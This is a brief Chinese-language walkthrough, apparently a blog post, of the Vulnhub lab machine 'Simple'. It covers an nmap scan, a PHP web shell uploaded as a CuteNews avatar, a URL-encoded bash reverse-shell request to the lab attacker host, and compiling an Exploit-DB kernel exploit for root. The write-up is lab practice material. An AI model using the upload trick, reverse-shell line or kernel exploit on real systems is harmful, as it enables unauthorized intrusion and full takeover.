[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
qianshang2333 小时前
SQL注入学习总结
网络·数据库·渗透
云小逸5 小时前
【网络通信】同一网段与不同网段的通信原理
网络·网络安全
zr5268554476 小时前
PCIe-PN卡(三格电子)
网络
无名的小三轮6 小时前
防火墙基础实验:智能选路下的透明DNS选路配置
网络
一轮弯弯的明月6 小时前
TCP传输大致过程、流量控制与拥塞控制
网络·tcp/ip·计算机网络·学习心得
犀思云6 小时前
如何通过网络即服务平台实现企业数字化转型?
运维·网络·人工智能·系统架构·机器人
皇帝要考研6 小时前
【ISO 13400-2:2019】核心配置项
网络·网络协议
犀思云7 小时前
企业端到端NaaS连接的优势与应用
网络·人工智能·机器人·智能仓储·专线
Godspeed Zhao8 小时前
现代智能汽车系统——总线技术1
网络·汽车·php
JoySSLLian8 小时前
IP SSL证书:一键解锁IP通信安全,高效抵御网络威胁!
网络·人工智能·网络协议·tcp/ip·ssl
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)042026数学建模美赛题目特点与选题建议,常用四大模型汇总05UV安装并设置国内源062026美赛A题智能手机电池续航时间预测的连续时间数学模型07在Trae中使用Pencil MCP08Claude Code Skills 实用使用手册09Linux下V2Ray安装配置指南10一种新的LCA算法